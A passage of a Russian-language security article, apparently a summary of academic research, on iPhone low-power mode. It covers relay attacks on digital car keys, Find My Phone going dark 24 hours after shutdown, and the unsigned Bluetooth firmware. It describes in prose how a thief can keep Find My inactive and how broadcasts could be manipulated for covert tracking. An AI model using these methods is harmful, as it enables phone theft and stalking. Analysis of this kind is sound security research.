для автомобиль­ ных­ ключей­ подверже­ ны­ эстафет­ ным­ атакам­ . При эстафет­ ных­ атаках­ сигналы­ предают­ ся­ на большие­ рассто­ яния­ , чем задумано­ . Это серь ­ езная угроза­ , посколь­ ку­ эстафет­ ная­ атака­ открывает­ доступ­ к машине, когда­ ее владель­ ца­ поблизос­ ти­ нет. Короткие­ дистанции­ можно­ преодо­ леть­ , уси ­ ливая имеющий­ ся­ сигнал­ . На длинных­ дистанци­ ях­ сигнал­ требует­ ся­ декоди ­ ровать в пакеты и уже их переадре­ совы­ вать­ с устройства­ на устройство­ . Пер ­ вый практичный­ и недорогой­ инстру­ мент­ для эстафет­ ных­ атак на основе­ NFC был описан­ в 2011 году, и до сих пор поддержи­ вают­ ся­ аналогич­ ные­ инстру­ ­ менты­ , рассчи­ тан­ ные­ на новейшие­ NFC-технологии­ .

Тогда­ как специфи­ ­кация DCK 2.0 основана­ на NFC, в DCK 3.0 добавлен­ контроль­ безопасного­ рассто­ ­яния (secure ranging) на основе­ UWB. Хотя UWB и рекламиро­ ­валась как технология­ , поддержи­ ­вающая контроль­ безопасного­ рассто­ ­яния, ее фундамен­ ­таль­ные измеритель­ ­ные параметры­ неидеальны­ . На практике­ уже продемонс­ ­три­рова­ны дешевые атаки­ по сокращению­ рас ­ стояния­ , направлен­ ­ные на UWB-чип Apple (на дистанции­ до 12 м).

Протокол­ DCK 3.0 использует­ как BLE, так и UWB. BLE обеспечива­ ет­ пер ­ вичное соединение­ и аутентифика­ цию­ . Затем UWB применя­ ется­ для точеч ­ ного измерения­ рассто­ яния­ (fne ranging) с защитой симметрич­ ным­ ключом­ , но без передачи­ данных­ . Следова­ тель­ но­ , как BLE, так и UWB требуют­ доступа­

к секретно­ ­му ключу­ . Специфи­ ­кация DCK 3.0, пошагово­ описыва­ ­ющая работу протоко­ ­лов BLE и UWB, доступна­ исключитель­ ­но членам­ Car Connectivity Consortium.

Apple стала­ использовать­ аппарат­ ные­ компонен­ ты­ для DCK 3.0 с версии­ iPhone 11. На айфонах­ с поддер­ жкой­ DCK 3.0 безопасная­ среда­ (SE) жестко­ вшита­ в чипы Bluetooth и UWB. Следова­ тель­ но­ , аналогич­ но­ использующим­ SE NFC-транзакци­ ям­ , генерируемые­ SE отклики­ передаются­ непосредс­ твен­ но­

в эфир, без совмес­ ­тно­го использования­ в iOS. Модели айфонов­ , оборудо­ ­ ванные­ чипами Bluetooth и UWB с поддер­ ­жкой низкого­ энергопот­ ­ребле­ния (LPM), перечислены­ в следующей­ таблице­ .

Беспро­ вод­ ные­ чипы, активно использующие­ поддер­ жку­ LPM

НЕДОСТАТКИ FIND MY PHONE

На уровне­ приложе­ ­ния исследова­ ­тели исходили­ из того, что злоумыш­ ­ленник не манипулиро­ вал­ прошив­ кой­ или ПО на iPhone. Напротив­ , атакующие­ пыта ­ ются скомпро­ мети­ ровать­ или использовать­ возможнос­ ти­ LPM — например­ , отключить­ сеть Find My Phone для кражи­ iPhone или восполь­ зовать­ ся­ экс ­ пресс картами­ для кражи­ денег.

На примере­ сети Find My Phone было обнаруже­ ­но, что телефон прекраща­ ­ ет посылать широковеща­ ­тель­ные сообщения­ гораздо­ раньше­ , чем ожи ­ далось, а во многих­ случаях­ не рассыла­ ­ет их вообще­ . При завершении­ работы по инициати­ ­ве пользовате­ ­ля система­ создает­ всего­ 96 таких сооб ­ щений, которые рассыла­ ­ются с интервалом­ в 15 мин. Через 24 ч будут переданы­ все сообщения­ . Это не разъясня­ ­ется пользовате­ ­лю, который может подумать, будто­ его потерянный­ iPhone можно­ найти­ в течение многих­ дней. Кроме­ того, сеть Find My Phone можно­ выключить­ при отключении­ питания устройства­ , но для этого­ в iOS 15.3 и выше придет­ ­ся ввести­ пароль — таким образом­ Apple предус­ ­мотре­ла еще один инстру­ ­мент против­ кражи­ .

Запаро­ лен­ ное­ диалоговое­ окно, в котором можно­ отключить­ сеть Find My при отключении­ питания

Сеть Find My прекраща­ ­ет работу до первой­ разбло­ ­киров­ки айфона­ спус ­ тя 24 ч. При выключении­ телефона­ сообщения­ , рассчи­ ­тан­ные на сле ­ дующие 24 ч, дополнитель­ ­но хранят­ ­ся на устройстве­ . Даже если сеть Find My будет отключена­ принуди­ ­тель­но, сообщения­ все равно­ кешируются­ . Как толь ­ ко iPhone загрузит­ ­ся, он восста­ ­новит токен Find My из хранили­ ­ща с энер гонезависи­ ­мой памятью (NVRAM), и этот токен сохраня­ ­ется от перезагрузки­

к перезагрузке­ . Затем токен Find My использует­ ­ся для дешифровки­ кеширо ­ ванных­ сообщений­ , предос­ ­тавляя доступ­ к ним демону Bluetooth перед пер вой разбло­ ­киров­кой. По истечении­ 24 ч iPhone прекраща­ ­ет рассылать­ сооб ­ щения. Это не зависит от предпри­ ­нятых ранее действий­ , iPhone мог уже находиться­ в режиме LPM или быть перезагружен­ напрямую­ . Посколь­ ­ку сооб ­ щения жестко­ привяза­ ­ны к запланиро­ ­ван­ному периоду­ передачи­ , продлить­ этот период­ невозможно­ .

Если­ перед первой­ разбло­ киров­ кой­ у iPhone есть соединение­ с интерне ­ том, то он подклю­ чит­ ся­ к серверам­ Apple и сообщит­ свое местополо­ жение­ . iPhone может оказать­ ся­ офлайн перед первой­ разбло­ киров­ кой­ по многим­ причинам­ . Ключи­ Wi-Fi доступны­ только­ после­ первой­ разбло­ киров­ ки­ , а сотовое соединение­ обрывает­ ся­ , если пользователь­ защитил SIM-карту­ пин кодом либо SIM-карта­ была извлечена­ . Следова­ тель­ но­ , вор может быть уверен­ , что через 24 ч функция­ Find My Phone будет неактивна­ , даже если он подклю­ чит­ iPhone к зарядному­ устройству­ , — достаточ­ но­ извлечь SIM-карту­ и включить­ телефон вне зоны действия­ открытых­ беспро­ вод­ ных­ сетей.

Даже­ когда­ в пользователь­ ­ском интерфейсе­ отобража­ ­ется сообщение­ , что функция­ Find My Phone активиро­ ­вана после­ отключения­ питания, иногда­ это не соответс­ ­тву­ет действи­ ­тель­нос­ти. Например­ , в Find My Phone может отказать­ генерация­ сообщений­ . Если при отключении­ устройства­ настрой­ ­ка Find My по какой то причине­ завершится­ ошибкой­ , никаких предуп­ ­режде­ний об этом пользователь­ не получит.

Иссле­ дова­ тели­ заметили­ и еще один забавный­ момент. Если при отклю ­ чении питания iPhone по инициати­ ве­ пользовате­ ля­ подклю­ чить­ устройство­

к электро­ ­сети через зарядку­ , а потом зарядку­ убрать, то через пару часов iPhone загрузит­ ­ся сам. Если при отключении­ кабель в iPhone не вставлен­ , то автомати­ ­чес­кой загрузки­ устройства­ не произой­ ­дет. По этой причине­ поль ­ зователь через какое то время­ может обнаружить­ , что батарея его iPhone полностью­ опустошена­ , хотя он телефон не включал­ .

ВМЕШАТЕЛЬСТВО В ПРОШИВКУ

В современ­ ­ных моделях iPhone поддер­ ­жка LPM присутс­ ­тву­ет в чипах ком ­ муникации­ NFC, UWB и Bluetooth. Злоумыш­ ­ленни­ку не требует­ ­ся менять поведение­ ядра, он может восполь­ ­зовать­ся имеющи­ ­мися драйверами­ , чтобы­ включить­ LPM на этих чипах, при этом модифициро­ ­вать приходит­ ­ся только­ прошив­ ­ку чипа. Чип NFC — единствен­ ­ный беспро­ ­вод­ной чип на iPhone, обла ­ дающий зашифрован­ ­ной и подписан­ ­ной прошив­ ­кой. Пусть даже и предпри­ ­ нимались­ попытки­ обойти­ безопасный­ загрузчик­ , они были безуспешны­ . Чип UWB также­ предус­ ­матри­вает защищенную­ загрузку­ , но его прошив­ ­ка не зашифрована­ , только­ подписана­ . При этом прошив­ ­ка Bluetooth не зашиф ­ рована и не подписана­ . Посколь­ ­ку у чипа Bluetooth не предус­ ­мотре­на безопасная­ загрузка­ , в нем отсутству­ ­ет корневой­ доверенный­ сертификат­ , который позволил­ бы проверить­ загружа­ ­емую прошив­ ­ку.

Злоумыш­ ленни­ ки­ , не обладающие­ доступом­ к устройству­ на уровне­ сис ­ темы, могут попытаться­ перехватить­ управление­ девайсом­ через чип с под ­ держкой­ LPM. Ранее были выявлены­ различные­ уязвимос­ ти­ для серии Bluetooth-чипов, используемых­ в iPhone. Такие уязвимос­ ти­ также­ существу­ ют­

и в других­ беспро­ ­вод­ных чипах. В частнос­ ­ти, модуль Find My Phone рассыла­ ­ет сообщения­ по Bluetooth, но не получает­ данные­ . Однако­ экспресс­ режим для NFC, а также­ Bluetooth и UWB для DCK 3.0 допускают­ обмен данными­ .

Даже­ если бы вся прошив­ ка­ могла­ быть защищена­ от манипуляций­ , зло ­ умышленник­ , обладающий­ доступом­ к устройству­ на уровне­ системы­ , все равно­ мог бы отправлять­ на его чипы собствен­ ные­ команды­ . Демон Bluetooth конфигури­ рует­ режим LPM для сети Find My Phone при выключении­ устрой ­ ства, для этого­ используют­ ся­ вендор­ специфич­ ные­ команды­ HCI. Эти коман ­ ды выполняют­ конфигури­ рова­ ние­ с очень высокой детализаци­ ей­ , в том числе­ позволя­ ют­ настра­ ивать­ интервалы­ ротации широковеща­ тель­ ных­ сообщений­ и их содержимое­ . При помощи этих команд злоумыш­ ленник­ мог бы, к при ­ меру, установить­ публичный­ ключ в качестве­ содержимого­ каждого­ второго­ сообщения­ так, чтобы­ этот ключ подходил­ к аккаунту­ . После­ этого­ атакующий­

смог бы найти­ устройство­ жертвы­ , а настоящий­ пользователь­ видел бы в сети Find My Phone недавнее­ местополо­ ­жение своего­ iPhone, которого­ там уже нет.

ЗАКЛЮЧЕНИЕ

Посколь­ ку­ поддер­ жка­ LPM основана­ на аппарат­ ной­ составля­ ющей­ iPhone, ее невозможно­ удалить­ при помощи системных­ обновлений­ . Соответс­ твен­ но­ , она оказыва­ ет­ долгосроч­ ное­ влияние­ на всю модель безопасности­ в iOS.

По видимому­ , дизайн возможнос­ ­тей LPM в основном строился­ исходя­ из практичес­ ­ких соображений­ , без учета­ угроз, возника­ ­ющих при выходе за пределы­ предус­ ­мотрен­ных вариантов­ примене­ ­ния. Посколь­ ­ку сеть Find My Phone продол­ ­жает работать и после­ выключения­ iPhone, устройства­ по опре ­ делению­ превраща­ ­ются в инстру­ ­мент для слежки­ , а реализация­ прошив­ ­ки Bluetooth не защищена­ от манипуляций­ . Свойства­ слежения­ могут быть незаметно­ изменены­ злоумыш­ ­ленни­ком, заполучив­ ­шим доступ­ к устройству­ на уровне­ системы­ . Более того, современ­ ­ная поддер­ ­жка цифровых­ авто ­ мобильных­ ключей­ требует­ сверхши­ ­рокой полосы передачи­ данных­ в LPM.

В настоящее­ время­ Bluetooth и UWB жестко­ зашиты в безопасную­ среду­ (SE), именно­ в них хранят­ ся­ автомобиль­ ные­ ключи­ и другие­ секреты­ . Учи ­ тывая, что прошив­ ка­ Bluetooth поддает­ ся­ манипуляции­ , доступ­ к интерфейсам­ SE открывает­ ся­ и из iOS.

Даже­ притом­ , что во многих­ вариантах­ примене­ ­ния LPM повышается­ уро ­ вень защищенности­ и безопасности­ , Apple следова­ ­ло бы добавить в iPhone аппарат­ ­ный переключатель­ , который разъеди­ ­нял бы устройство­ и батарею. Это улучшило­ бы ситуацию­ для лиц, особен­ ­но обеспоко­ ­енных конфиден­ ­ циальностью­ данных­ и потенциаль­ ­но подвержен­ ­ных слежке­ , например­ для журналис­ ­тов.